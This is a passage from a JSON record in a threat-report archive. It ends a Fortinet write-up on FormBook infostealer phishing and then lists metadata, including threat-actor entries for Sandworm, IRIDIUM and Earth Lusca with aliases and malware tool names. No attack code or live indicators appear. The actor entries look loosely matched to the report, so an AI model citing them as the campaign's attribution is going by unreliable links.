As a result, customers who have these products with up-to-date\r\nprotections are already protected.\r\nYou can sign up to receive future alerts and stay informed of new and emerging threats.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module\r\non Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\nC2 Server URLs:\r\nSource: https://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign"
	],
	"report_names": [
		"infostealer-malware-formbook-spread-via-phishing-campaign"
	],
	"threat_actors": [
		{
			"id": "0661a292-80f3-420b-9951-a50e03c831c0",
			"created_at": "2023-01-06T13:46:38.928796Z",
			"updated_at": "2026-04-10T02:00:03.148052Z",
			"deleted_at": null,
			"main_name": "IRIDIUM",
			"aliases": [],
			"source_name": "MISPGALAXY:IRIDIUM",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "75455540-2f6e-467c-9225-8fe670e50c47",
			"created_at": "2022-10-25T16:07:23.740266Z",
			"updated_at": "2026-04-10T02:00:04.732992Z",
			"deleted_at": null,
			"main_name": "Iridium",
			"aliases": [],
			"source_name": "ETDA:Iridium",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"LazyCat",
				"Powerkatz",
				"SinoChopper",
				"reGeorg"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
				"TEMP.Noble ",
				"Telebots ",
				"Voodoo Bear "
			],
			"source_name": "Secureworks:IRON VIKING",
			"tools": [
				"BadRabbit",
				"BlackEnergy",
				"GCat",
				"NotPetya",
				"PSCrypt",
				"TeleBot",
				"TeleDoor",
				"xData"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6",
			"created_at": "2022-10-25T15:50:23.339976Z",
			"updated_at": "2026-04-10T02:00:05.27483Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"Sandworm Team",
				"ELECTRUM",
				"Telebots",
				"IRON VIKING",
				"BlackEnergy (Group)",
				"Quedagh",
				"Voodoo Bear",
				"IRIDIUM",
				"Seashell Blizzard",
				"FROZENBARENTS",
				"APT44"
			],
			"source_name": "MITRE:Sandworm Team",
			"tools": [
				"Bad Rabbit",
				"Mimikatz",
				"Exaramel for Linux",
				"Exaramel for Windows",
				"GreyEnergy",
				"PsExec",
				"Prestige",
				"P.A.S. Webshell",
				"AcidPour",
				"VPNFilter",
				"Neo-reGeorg",
				"Cyclops Blink",
				"SDelete",
				"Kapeka",
				"AcidRain",
				"Industroyer",
				"Industroyer2",
				"BlackEnergy",
				"Cobalt Strike",
				"NotPetya",
				"KillDisk",
				"PoshC2",
				"Impacket",
				"Invoke-PSImage",
				"Olympic Destroyer"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434365,
	"ts_updated_at": 1775792228,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6f152f291107aa70fae888d111633b34ed37ff8c.pdf",
		"text": "https://archive.orkl.eu/6f152f291107aa70fae888d111633b34ed37ff8c.txt",
		"img": "https://archive.orkl.eu/6f152f291107aa70fae888d111633b34ed37ff8c.jpg"
	}
}